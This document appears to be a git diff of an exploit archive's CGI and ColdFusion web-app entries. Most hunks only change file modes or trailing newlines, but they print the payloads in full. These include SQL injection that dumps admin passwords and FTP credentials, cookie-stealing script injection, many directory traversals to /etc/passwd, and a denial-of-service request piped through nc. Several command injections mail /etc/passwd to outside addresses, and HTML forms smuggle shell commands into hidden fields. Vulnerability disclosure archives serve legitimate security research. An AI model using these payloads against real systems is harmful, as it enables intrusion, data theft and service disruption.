application, acc Site Manager 3.0 is vulnarable; other versions may also be affected. http://www.example.com/page.cfm?id=null+and+100=99+union+select+1,2,3,4,concat(name,0x3a,password),6+from+author -http://www.example.com/page.cfm?id=null+and+100=99+union+select+1,2,3,4,conca(ftpserver,0x3a,domainname,0x3a,ftpusername,0x3a,ftppassword),6+from+webdata \ No newline at end of file +http://www.example.com/page.cfm?id=null+and+100=99+union+select+1,2,3,4,conca(ftpserver,0x3a,domainname,0x3a,ftpusername,0x3a,ftppassword),6+from+webdata \ No newline at end of file diff --git a/platforms/cfm/webapps/35107.txt b/platforms/cfm/webapps/35107.txt old mode 100755 new mode 100644 diff --git a/platforms/cfm/webapps/35256.txt b/platforms/cfm/webapps/35256.txt old mode 100755 new mode 100644 index e1d2488df..067260fa5 --- a/platforms/cfm/webapps/35256.txt +++ b/platforms/cfm/webapps/35256.txt @@ -8,4 +8,4 @@ Lomtec ActiveWeb Professional 3.0 is vulnerable; other versions may also be affe 1. Go to the page http://www.example.com/activeweb/EasyEdit.cfm?module=EasyEdit&page=getimagefile&Filter= -2. Change the 'UploadDirectory' and 'Accepted Extensions' hidden form fields to upload the malicious file to the directory of interest. \ No newline at end of file +2. Change the 'UploadDirectory' and 'Accepted Extensions' hidden form fields to upload the malicious file to the directory of interest. \ No newline at end of file diff --git a/platforms/cfm/webapps/36067.txt b/platforms/cfm/webapps/36067.txt old mode 100755 new mode 100644 diff --git a/platforms/cfm/webapps/36172.txt b/platforms/cfm/webapps/36172.txt old mode 100755 new mode 100644 index cc96a262f..472b2fc26 --- a/platforms/cfm/webapps/36172.txt +++ b/platforms/cfm/webapps/36172.txt @@ -10,4 +10,4 @@ http://example.com/CFIDE/componentutils/componentdetail.cfm?component=%3Cbody%20 http://example.com/CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=%3Cbody%20onload=alert(document.cookie)%3E -http://example.com/CFIDE/componentutils/cfcexplorer.cfc?method=%3Cbody%20onload=alert(document.cookie)%3E \ No newline at end of file +http://example.com/CFIDE/componentutils/cfcexplorer.cfc?method=%3Cbody%20onload=alert(document.cookie)%3E \ No newline at end of file diff --git a/platforms/cfm/webapps/36815.txt b/platforms/cfm/webapps/36815.txt old mode 100755 new mode 100644 diff --git a/platforms/cfm/webapps/43045.txt b/platforms/cfm/webapps/43045.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/dos/19899.txt b/platforms/cgi/dos/19899.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/dos/20071.c b/platforms/cgi/dos/20071.c old mode 100755 new mode 100644 index 6d5ca7c1d..84119a776 --- a/platforms/cgi/dos/20071.c +++ b/platforms/cgi/dos/20071.c @@ -50,4 +50,4 @@ void main(int argc, char *argv[]) close(sock); printf("Done. Refresh the page to see if it worked.\n"); -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/cgi/dos/20400.txt b/platforms/cgi/dos/20400.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/dos/20753.txt b/platforms/cgi/dos/20753.txt old mode 100755 new mode 100644 index da9211295..91a04948b --- a/platforms/cgi/dos/20753.txt +++ b/platforms/cgi/dos/20753.txt @@ -6,4 +6,4 @@ A problem in the Net.Commerce package could allow a remote user to deny service A remote user may use this vulnerability to crash the Websphere server, thus denying service to legitimate users. -http://host/cgi-bin/ncommerce3/ExecMacro/macro.d2w/%0a%0a..(aprox 1000)..%0a \ No newline at end of file +http://host/cgi-bin/ncommerce3/ExecMacro/macro.d2w/%0a%0a..(aprox 1000)..%0a \ No newline at end of file diff --git a/platforms/cgi/dos/21048.txt b/platforms/cgi/dos/21048.txt old mode 100755 new mode 100644 index eed8b0918..723219fc0 --- a/platforms/cgi/dos/21048.txt +++ b/platforms/cgi/dos/21048.txt @@ -11,4 +11,4 @@ $ echo "GET xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" | nc -machttp-server.com 80 \ No newline at end of file +machttp-server.com 80 \ No newline at end of file diff --git a/platforms/cgi/dos/21620.txt b/platforms/cgi/dos/21620.txt old mode 100755 new mode 100644 index 1d6f2d9bb..78b25648b --- a/platforms/cgi/dos/21620.txt +++ b/platforms/cgi/dos/21620.txt @@ -6,4 +6,4 @@ The vulnerability occurs when an attacker makes a request to 'request.cgi' using Note: it was reported that the value for the 'psearch' parameter also causes a crash, however this could not be reproduced by SecurityFocus. -http://<musicserver>/request.cgi?listpos=999...999(9x256) \ No newline at end of file +http://<musicserver>/request.cgi?listpos=999...999(9x256) \ No newline at end of file diff --git a/platforms/cgi/dos/24619.txt b/platforms/cgi/dos/24619.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/dos/39073.txt b/platforms/cgi/dos/39073.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/local/20092.txt b/platforms/cgi/local/20092.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/1862.c b/platforms/cgi/remote/1862.c old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/19745.txt b/platforms/cgi/remote/19745.txt old mode 100755 new mode 100644 index ea9b241b9..b21674bd2 --- a/platforms/cgi/remote/19745.txt +++ b/platforms/cgi/remote/19745.txt @@ -6,4 +6,4 @@ A request like: http ://target/finger.cgi?action=archives&cmd=specific &filename=99.10.28.15.23.username.|<shell command>| (split for readability) -will cause the server to execute whatever command is specified. \ No newline at end of file +will cause the server to execute whatever command is specified. \ No newline at end of file diff --git a/platforms/cgi/remote/19747.txt b/platforms/cgi/remote/19747.txt old mode 100755 new mode 100644 index b2738dd6e..7914cc3c0 --- a/platforms/cgi/remote/19747.txt +++ b/platforms/cgi/remote/19747.txt @@ -4,4 +4,4 @@ Appending "%00" to the end of a CGI script filename will permit a remote client http ://target/script.cgi%00 -"%00" may be replaced with "%G0", "%W0", "%EW", "%FG", "%UW", or "%VG" in order to achieve the same results. \ No newline at end of file +"%00" may be replaced with "%G0", "%W0", "%EW", "%FG", "%UW", or "%VG" in order to achieve the same results. \ No newline at end of file diff --git a/platforms/cgi/remote/19786.txt b/platforms/cgi/remote/19786.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/19795.txt b/platforms/cgi/remote/19795.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/19808.txt b/platforms/cgi/remote/19808.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/19842.txt b/platforms/cgi/remote/19842.txt old mode 100755 new mode 100644 index 214495aff..ead25b513 --- a/platforms/cgi/remote/19842.txt +++ b/platforms/cgi/remote/19842.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/1102/info Web+ is an e-commerce server designed to run under a webserver, to provide web storefronts. The various scripts that are required to do this are specified to the webpsvr daemon via a 'script' variable passed to the webplus CGI. This CGI can be passed a path to any file via the script variable, resulting in arbitrary files being displayed to the browser. This vulnerability is limited to files that are known to the user and that the webpsvr daemon has read access to. -http&nbsp;://target/cgi-bin/webplus?script=/../../../../etc/passwd \ No newline at end of file +http&nbsp;://target/cgi-bin/webplus?script=/../../../../etc/passwd \ No newline at end of file diff --git a/platforms/cgi/remote/19844.txt b/platforms/cgi/remote/19844.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/19852.txt b/platforms/cgi/remote/19852.txt old mode 100755 new mode 100644 index 608804bd9..cb3e191f1 --- a/platforms/cgi/remote/19852.txt +++ b/platforms/cgi/remote/19852.txt @@ -15,4 +15,4 @@ http://target/cgi-bin/cart.pl?vars http://target/cgi-bin/cart.pl?env http://target/cgi-bin/cart.pl?db -http://target/cgi-bin/scripts/cart.pl?name=<Name&nbsp;of&nbsp;item>&price=<Price&nbsp;of&nbsp;product>&sh=<Shipping&nbsp;and&nbsp;handling>&img=<Image&nbsp;file>&return=<Target&nbsp;host>&custom1=<Description&nbsp;of&nbsp;Product> \ No newline at end of file +http://target/cgi-bin/scripts/cart.pl?name=<Name&nbsp;of&nbsp;item>&price=<Price&nbsp;of&nbsp;product>&sh=<Shipping&nbsp;and&nbsp;handling>&img=<Image&nbsp;file>&return=<Target&nbsp;host>&custom1=<Description&nbsp;of&nbsp;Product> \ No newline at end of file diff --git a/platforms/cgi/remote/19890.txt b/platforms/cgi/remote/19890.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/19913.txt b/platforms/cgi/remote/19913.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/19921.txt b/platforms/cgi/remote/19921.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/19951.php b/platforms/cgi/remote/19951.php old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/19956.txt b/platforms/cgi/remote/19956.txt old mode 100755 new mode 100644 index 180256008..aec4b91a0 --- a/platforms/cgi/remote/19956.txt +++ b/platforms/cgi/remote/19956.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/1243/info By default JetAdmin Web Interface Server listens on port 8000. By requesting a specially formed URL which includes "../" it is possible for a remote user to gain read-access to any files outside of the web-published directory. -http://target:8000/cgi/wja?page=/../../../filename \ No newline at end of file +http://target:8000/cgi/wja?page=/../../../filename \ No newline at end of file diff --git a/platforms/cgi/remote/19995.txt b/platforms/cgi/remote/19995.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/20007.c b/platforms/cgi/remote/20007.c old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/20008.txt b/platforms/cgi/remote/20008.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/20041.txt b/platforms/cgi/remote/20041.txt old mode 100755 new mode 100644 index 76bee66cc..d5a158634 --- a/platforms/cgi/remote/20041.txt +++ b/platforms/cgi/remote/20041.txt @@ -8,4 +8,4 @@ http://target:port/sawmill?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+ If sawmill is run as a cgi script, the following can be used instead: -http://target/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1 \ No newline at end of file +http://target/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1 \ No newline at end of file diff --git a/platforms/cgi/remote/20059.txt b/platforms/cgi/remote/20059.txt old mode 100755 new mode 100644 index 433079893..c29385864 --- a/platforms/cgi/remote/20059.txt +++ b/platforms/cgi/remote/20059.txt @@ -4,4 +4,4 @@ Poll It is a Perl CGI application used to create and maintain opinion polls on w This can lead to unauthorized file reads, as well as potentially other compromises. -http: //target/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/passwd%00 \ No newline at end of file +http: //target/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/passwd%00 \ No newline at end of file diff --git a/platforms/cgi/remote/20068.txt b/platforms/cgi/remote/20068.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/20085.txt b/platforms/cgi/remote/20085.txt old mode 100755 new mode 100644 index 73fc2f745..78bfcc521 --- a/platforms/cgi/remote/20085.txt +++ b/platforms/cgi/remote/20085.txt @@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/1485/info Alibaba Web Server fails to filter piped commands when executing cgi-scripts. This can be used to execute commands with the privileges of the web server process on a target machine. http://victim/cgi-bin/post32.exe|echo%20>c:\text.txt -http://victim/cgi-bin/lsindex2.bat|dir%20c:\[dir] \ No newline at end of file +http://victim/cgi-bin/lsindex2.bat|dir%20c:\[dir] \ No newline at end of file diff --git a/platforms/cgi/remote/20156.txt b/platforms/cgi/remote/20156.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/20165.html b/platforms/cgi/remote/20165.html old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/20177.html b/platforms/cgi/remote/20177.html old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/20218.txt b/platforms/cgi/remote/20218.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/20238.txt b/platforms/cgi/remote/20238.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/20242.txt b/platforms/cgi/remote/20242.txt old mode 100755 new mode 100644 index 4433fe8df..1e445b936 --- a/platforms/cgi/remote/20242.txt +++ b/platforms/cgi/remote/20242.txt @@ -45,4 +45,4 @@ S97IS Service manager failed to process request Note that the line: Error E1-0133 (Query Builder): Error parsing query: 81888e0 -This shows that the server is interpreting the %x argument passed in the URI as the "queryText" value. Supplying a carefully built value for the queryText argument an attacker can change the program flow and execute arbitrary code. \ No newline at end of file +This shows that the server is interpreting the %x argument passed in the URI as the "queryText" value. Supplying a carefully built value for the queryText argument an attacker can change the program flow and execute arbitrary code. \ No newline at end of file diff --git a/platforms/cgi/remote/20244.txt b/platforms/cgi/remote/20244.txt old mode 100755 new mode 100644 index be30aab33..b38873d17 --- a/platforms/cgi/remote/20244.txt +++ b/platforms/cgi/remote/20244.txt @@ -6,4 +6,4 @@ A vulnerability exists in one of the CGI applications implemented by Web+. It is Successful exploitation of this vulnerability could aid in further and more complicated attacks against the target site. -http://target/cgi-bin/webplus.exe?about \ No newline at end of file +http://target/cgi-bin/webplus.exe?about \ No newline at end of file diff --git a/platforms/cgi/remote/20245.txt b/platforms/cgi/remote/20245.txt old mode 100755 new mode 100644 index d3b03450f..76d7ea679 --- a/platforms/cgi/remote/20245.txt +++ b/platforms/cgi/remote/20245.txt @@ -6,4 +6,4 @@ Web+ can be used to display the source code of WML files residing on an NTFS par Successful exploitation of this vulnerability may reveal source code, table names, usernames, passwords, and other forms of confidential data. -http://target/cgi-bin/webplus.exe?script=test.wml::$DATA \ No newline at end of file +http://target/cgi-bin/webplus.exe?script=test.wml::$DATA \ No newline at end of file diff --git a/platforms/cgi/remote/20273.txt b/platforms/cgi/remote/20273.txt old mode 100755 new mode 100644 index e10dfb986..ade89ef76 --- a/platforms/cgi/remote/20273.txt +++ b/platforms/cgi/remote/20273.txt @@ -5,4 +5,4 @@ The 'cached_feed' CGI script supplied by newsfeed vendor Moreover.com contains a Version 1.0 of the product is affected. The vendor repaired the script and released version 2.0 before this vulnerability was published. -http://www.example.com/cgi-bin/cached_feed.cgi?../../../.+/etc/passwd \ No newline at end of file +http://www.example.com/cgi-bin/cached_feed.cgi?../../../.+/etc/passwd \ No newline at end of file diff --git a/platforms/cgi/remote/20277.txt b/platforms/cgi/remote/20277.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/20279.txt b/platforms/cgi/remote/20279.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/20280.txt b/platforms/cgi/remote/20280.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/20281.txt b/platforms/cgi/remote/20281.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/20370.txt b/platforms/cgi/remote/20370.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/20387.txt b/platforms/cgi/remote/20387.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/20397.txt b/platforms/cgi/remote/20397.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/20408.txt b/platforms/cgi/remote/20408.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/20423.txt b/platforms/cgi/remote/20423.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/20430.txt b/platforms/cgi/remote/20430.txt old mode 100755 new mode 100644 index bb12762f0..66758259b --- a/platforms/cgi/remote/20430.txt +++ b/platforms/cgi/remote/20430.txt @@ -9,4 +9,4 @@ You have new mail. $ Remotely: -http://targethost/cgi-bin/info2www?(../../../../../../../../bin/mail recipient </etc/passwd|) \ No newline at end of file +http://targethost/cgi-bin/info2www?(../../../../../../../../bin/mail recipient </etc/passwd|) \ No newline at end of file diff --git a/platforms/cgi/remote/20433.txt b/platforms/cgi/remote/20433.txt old mode 100755 new mode 100644 index 501812fdf..241d69a8d --- a/platforms/cgi/remote/20433.txt +++ b/platforms/cgi/remote/20433.txt @@ -6,4 +6,4 @@ Depending on the specific script used, the following syntaxes have been shown to 1) ;command 2) ";command -3) ;command; \ No newline at end of file +3) ;command; \ No newline at end of file diff --git a/platforms/cgi/remote/20434.txt b/platforms/cgi/remote/20434.txt old mode 100755 new mode 100644 index e7d78db83..49b61ec70 --- a/platforms/cgi/remote/20434.txt +++ b/platforms/cgi/remote/20434.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/2001/info Miva's htmlscript CGI program provides a unique scripting language with HTML type tags. (Note that htmlscript is an older product no longer distributed by Miva under that name.) Versions of the htmlscript interpreter (a CGI script) prior to 2.9932 are vulnerable to a file reading directory traversal attack using relative paths (eg., "../../../../../../etc/passwd"). An attacker need only append this path as a variable passed to the script via a URL. The contents of any file to which the web server process has read access can be retrieved using this method. -http://host/cgi-bin/htmlscript?../../../../../../../etc/somefile \ No newline at end of file +http://host/cgi-bin/htmlscript?../../../../../../../etc/somefile \ No newline at end of file diff --git a/platforms/cgi/remote/20435.txt b/platforms/cgi/remote/20435.txt old mode 100755 new mode 100644 index ea98ea0a4..75296d7e0 --- a/platforms/cgi/remote/20435.txt +++ b/platforms/cgi/remote/20435.txt @@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/2003/info NCSA HTTPd and comes with a CGI sample shell script, test-cgi, located by default in /cgi-bin. This script does not properly enclose an "ECHO" command in quotes, and as a result "shell expansion" of the * character can occur under some configurations. This allows a remote attacker to obtain file listings, by passing *, /*, /usr/* etc., as variables. The ECHO command expands the * to give a directory listing of the specified directory. This could be used to gain information to facilitate future attacks. This is identical to a problem with another sample script, nph-test-cgi. See references. http://target/cgi-bin/test-cgi?/* -http://target/cgi-bin/test-cgi?* \ No newline at end of file +http://target/cgi-bin/test-cgi?* \ No newline at end of file diff --git a/platforms/cgi/remote/20442.html b/platforms/cgi/remote/20442.html old mode 100755 new mode 100644 index 329c7879d..f3633d1cf --- a/platforms/cgi/remote/20442.html +++ b/platforms/cgi/remote/20442.html @@ -10,4 +10,4 @@ Classifieds.cgi is a perl script (part of the classifieds package by Greg Matthe <input type="hidden" name="return" value="duke@viper.net.au"> <input type="hidden" name="mailprog" value="touch /tmp/bighole"> <b>Which department do you want your ad to be placed in or you would like to view? -</form> \ No newline at end of file +</form> \ No newline at end of file diff --git a/platforms/cgi/remote/20444.txt b/platforms/cgi/remote/20444.txt old mode 100755 new mode 100644 index 5f065268f..542449a78 --- a/platforms/cgi/remote/20444.txt +++ b/platforms/cgi/remote/20444.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/2020/info Classifieds.cgi is a perl script (part of the classifieds package by Greg Matthews) which provides simple classified ads to web sites. Due to improper input validation it can be used to read files on the host machine, with the privileges of the web server. This can be accomplished by embedding the input redirection metacharacter along with a filename into the form field used for e-mail address entry (<input name=return>). Any file that the web server process has read access to can be retrieved. -Submit email@host</etc/passwd as e-mail address. \ No newline at end of file +Submit email@host</etc/passwd as e-mail address. \ No newline at end of file diff --git a/platforms/cgi/remote/20446.txt b/platforms/cgi/remote/20446.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/20447.txt b/platforms/cgi/remote/20447.txt old mode 100755 new mode 100644 index 2fba6e7bb..3b8dbc486 --- a/platforms/cgi/remote/20447.txt +++ b/platforms/cgi/remote/20447.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/2024/info The freeware guestbook package from freeware.webcom.se provides a web-based guestbook feature, using CGI. Some versions of this guestbook (undetermined at the time of writing) are vulnerable to an attack allowing an intruder to retrieve the contents of arbitrary files to which the web server has access. This can be accomplished by specifying the path and filename as the parameter "template" to either rguest.exe or wguest.exe - see Exploit for example. These two programs typically reside in /cgi-bin. -http://server/cgi-bin/rguest.exe?template=c:\winnt\system32\$winnt$.inf will return the $winnt$.inf file \ No newline at end of file +http://server/cgi-bin/rguest.exe?template=c:\winnt\system32\$winnt$.inf will return the $winnt$.inf file \ No newline at end of file diff --git a/platforms/cgi/remote/20448.txt b/platforms/cgi/remote/20448.txt old mode 100755 new mode 100644 index 88a2735e0..0d7219377 --- a/platforms/cgi/remote/20448.txt +++ b/platforms/cgi/remote/20448.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/2025/info Novell NetWare Web Server 2.x versions came with a CGI written in BASIC called convert.bas. This script allows retrieval of files outside of the normal web server context. This can be accomplished simply by submitting the filename and path as a parameter to the script, using relative paths (../../) to traverse directories. Access may or may not be limited to the SYS: volume. -http://targethost/scripts/convert.bas?../../anything/you/want/to/view \ No newline at end of file +http://targethost/scripts/convert.bas?../../anything/you/want/to/view \ No newline at end of file diff --git a/platforms/cgi/remote/20463.txt b/platforms/cgi/remote/20463.txt old mode 100755 new mode 100644 index 74c6efc74..585688dd5 --- a/platforms/cgi/remote/20463.txt +++ b/platforms/cgi/remote/20463.txt @@ -8,4 +8,4 @@ Content-length: 85 (replace this with the actual length of the "exploit" line) query=';mail+drazvan\@pop3.kappa.ro</etc/passwd;echo'&output=subject&domain=paragraph -[...] But to make it work for your system too, you'll have to add other parameters, like idx_dir and data_type who are required by the script in its original version. Just make a normal query to your WebGais server and see what all the parameters are. But remember to use "output" and "domain" as specified in my exploit. Otherwise you will end up in some other place of the script and nothing will happen. \ No newline at end of file +[...] But to make it work for your system too, you'll have to add other parameters, like idx_dir and data_type who are required by the script in its original version. Just make a normal query to your WebGais server and see what all the parameters are. But remember to use "output" and "domain" as specified in my exploit. Otherwise you will end up in some other place of the script and nothing will happen. \ No newline at end of file diff --git a/platforms/cgi/remote/20483.txt b/platforms/cgi/remote/20483.txt old mode 100755 new mode 100644 index 39e9fe1c5..4cf86827c --- a/platforms/cgi/remote/20483.txt +++ b/platforms/cgi/remote/20483.txt @@ -6,4 +6,4 @@ telnet target.machine.com 80 POST /cgi-bin/websendmail HTTP/1.0 Content-length: xxx (should be replaced with the actual length of the string passed to the server, in this case xxx=90) -receiver=;mail+BUGTRAQ\@NETSPACE.ORG</etc/passwd;&sender=a&rtnaddr=a&subject=a&content=a \ No newline at end of file +receiver=;mail+BUGTRAQ\@NETSPACE.ORG</etc/passwd;&sender=a&rtnaddr=a&subject=a&content=a \ No newline at end of file diff --git a/platforms/cgi/remote/20497.html b/platforms/cgi/remote/20497.html old mode 100755 new mode 100644 index 7b8aaef0f..0dced463f --- a/platforms/cgi/remote/20497.html +++ b/platforms/cgi/remote/20497.html @@ -15,4 +15,4 @@ Command: <input type=text name=config value="../../../../../../../../bin/ping <input type=hidden name="e-mail" value="foo@bar.net"> <input type=hidden name=FavoriteColor value=Black> <input type=submit value=run> -</form> \ No newline at end of file +</form> \ No newline at end of file diff --git a/platforms/cgi/remote/20503.html b/platforms/cgi/remote/20503.html old mode 100755 new mode 100644 index d2afe5d3a..a2bc98c60 --- a/platforms/cgi/remote/20503.html +++ b/platforms/cgi/remote/20503.html @@ -10,4 +10,4 @@ Command: <input type=text name=MyEmail value=";"> <input type=hidden name=redirect value="http://goatse.cx"> <input type=submit name=submit value="run"> </form> -</html> \ No newline at end of file +</html> \ No newline at end of file diff --git a/platforms/cgi/remote/20504.html b/platforms/cgi/remote/20504.html old mode 100755 new mode 100644 index ab9f1924d..3665621a2 --- a/platforms/cgi/remote/20504.html +++ b/platforms/cgi/remote/20504.html @@ -10,4 +10,4 @@ The problem occurs in the method in which the script checks input. Due to insuff Command: <input type=text name=file value="../../../../../../../../bin/ping -c 5 www.foo.com|"> <input type=submit value=run> </form> -</html> \ No newline at end of file +</html> \ No newline at end of file diff --git a/platforms/cgi/remote/20506.html b/platforms/cgi/remote/20506.html old mode 100755 new mode 100644 index 6dc30fb60..19a12375d --- a/platforms/cgi/remote/20506.html +++ b/platforms/cgi/remote/20506.html @@ -12,4 +12,4 @@ Make a html form similar to:                 value=" | <COMMAND> |">                  <input type=hidden name="NAME" value="user">                  <input type=submit> -</form> \ No newline at end of file +</form> \ No newline at end of file diff --git a/platforms/cgi/remote/20522.txt b/platforms/cgi/remote/20522.txt old mode 100755 new mode 100644 index 79905457d..3101e5bca --- a/platforms/cgi/remote/20522.txt +++ b/platforms/cgi/remote/20522.txt @@ -8,4 +8,4 @@ Successful exploitation of this vulnerability could lead to the disclosure of se It should be noted that the attacker may only read files which are accessible to the web-server process. -http://target/technote/technote/print.cgi?board=../../../../../../../../etc/passwd%00 \ No newline at end of file +http://target/technote/technote/print.cgi?board=../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/cgi/remote/20524.txt b/platforms/cgi/remote/20524.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/20525.txt b/platforms/cgi/remote/20525.txt old mode 100755 new mode 100644 diff --git a/platforms/cgi/remote/20527.txt b/platforms/cgi/remote/20527.txt old mode 100755 new mode 100644 index 09e775ced..0520087bc --- a/platforms/cgi/remote/20527.txt +++ b/platforms/cgi/remote/20527.txt @@ -6,4 +6,4 @@ Under very specific circumstances, if webdriver is called directly, without any John Wright <john@dryfish.org> notes that this vulnerability will only be exploitable under a particular misconfiguration, and that by default, the above-described URL will result only in a "404 Asset not found", etc, and not in the display of a remote administration page. -http://example.com/cgi-bin/webdriver \ No newline at end of file +http://example.com/cgi-bin/webdriver \ No newline at end of file diff --git a/platforms/cgi/remote/20533.txt b/platforms/cgi/remote/20533.txt old mode 100755 new mode 100644 index ce68ada19..1d7a8c3b0 --- a/platforms/cgi/remote/20533.txt +++ b/platforms/cgi/remote/20533.txt @@ -6,4 +6,4 @@ Version 1.0 of bbs_forum.cgi fails to properly validate user-supplied, URL-encod www.web*site.com/cgi-bin/bbs_forum.cgi?forum=<forum_name>&read=../../../../../../etc/hosts.allow -note: The section: <forum_name> must be a valid forum on the webserver. \ No newline at end of file +note: The section: <forum_name> must be a valid forum on the webserver. \ No newline at end of file diff --git a/platforms/cgi/remote/20567.txt b/platforms/cgi/remote/20567.txt old mode 100755 new mode 100644 index e159a8ec2..22536f889 --- a/platforms/cgi/remote/20567.txt +++ b/platforms/cgi/remote/20567.txt @@ -4,4 +4,4 @@ PHP/FI is an software suite designed to offer enhanced features to sites served A problem with the software could allow remote users access to restricted resources. Due to a design problem in the software package, the PHP/FI software package allows a remote user to browse directories and view files stored on the local host. It is possible to view only those files which the UID of the local httpd process has access to read. A user with malicious intent could use this vulnerability to gather information on the local host, and possibly gain remote access to encrypted user passwords on a system not using the shadow password suite. -http://www.someurl.com/php.cgi?/path/to/file \ No newline at end of file +http://www.someurl.com/php.cgi?/path/to/file \ No newline at end of file diff --git a/platforms/cgi/remote/20570.txt b/platforms/cgi/remote/20570.txt old mode 100755 new mode 100644 index 661d8e759..65092ad8f --- a/platforms/cgi/remote/20570.txt +++ b/platforms/cgi/remote/20570.txt @@ -12,4 +12,4 @@ http://target/cgi-bin/dumpenv.pl The following is an example of the path to login as admin: -http://target/session/adminlogin?RCpage=/sysadmin/index.stm \ No newline at end of file +http://target/session/adminlogin?RCpage=/sysadmin/index.stm \ No newline at end of file diff --git a/platforms/cgi/remote/20609.txt b/platforms/cgi/remote/20609.txt old mode 100755 new mode 100644 index 84655763a..9ce5a5e59 --- a/platforms/cgi/remote/20609.txt +++ b/platforms/cgi/remote/20609.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/2336/info Requesting a specially crafted URL will make it possible for a remote attacker to disclose the physical path to the web root and peruse the entire directory listing. -http://target/cgi/ \ No newline at end of file +http://target/cgi/ \ No newline at end of file diff --git a/platforms/cgi/remote/20611.txt b/platforms/cgi/remote/20611.txt old mode 100755 new mode 100644 index 8d236f7c1..0a82ba342 --- a/platforms/cgi/remote/20611.txt +++ b/platforms/cgi/remote/20611.txt @@ -8,4 +8,4 @@ Update: It was originally believed that this issue does not affect Anaconda Foun http://www.example.com/cgi-bin/apexec.pl?etype=odp&template=../../../../../../../../../directory/filename.ext%00.html&passurl=/category/ -http://www.example.com/cgi-bin/apexec.pl?template=/etc/passwd%%0000.html \ No newline at end of file +http://www.example.com/cgi-bin/apexec.pl?template=/etc/passwd%%0000.html \ No newline at end of file diff --git a/platforms/cgi/remote/20623.txt b/platforms/cgi/remote/20623.txt old mode 100755 new mode 100644 index d2d1777c7..173a9804f --- a/platforms/cgi/remote/20623.txt +++ b/platforms/cgi/remote/20623.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/2361/info It is possible for a remote user to gain read access to directories and files outside the root directory of Carey Internet Services Commerce.cgi. Requesting a specially crafted URL composed of '/../%00' along with the known filename or directory will disclose the requested resource. -http://target/cgi/commerce.cgipage=../../../../etc/hosts%00filename.html \ No newline at end of file +http://target/cgi/commerce.cgipage=../../../../etc/hosts%00filename.html \ No newline at end of file diff --git a/platforms/cgi/remote/20629.txt b/platforms/cgi/remote/20629.txt old mode 100755 new mode 100644 index f738e8917..859cd2fe0 --- a/platforms/cgi/remote/20629.txt +++ b/platforms/cgi/remote/20629.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/2370/info A remote user could gain read access to known files outside of the root directory where Way-Board resides. Requesting a specially crafted URL composed of '%00' sequences along with the known filename will disclose the requested file. -http://target/way-board/way-board.cgi?db=url_to_any_file%00 \ No newline at end of file +http://target/way-board/way-board.cgi?db=url_to_any_file%00 \ No newline at end of file diff --git a/platforms/cgi/remote/20630.txt b/platforms/cgi/remote/20630.txt old mode 100755 new mode 100644 index 2701201f1..0d32d49f4 --- a/platforms/cgi/remote/20630.txt +++ b/platforms/cgi/remote/20630.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/2371/info A remote user could gain read access to known files outside of the root directory where Martin Hamilton ROADS resides. Requesting a 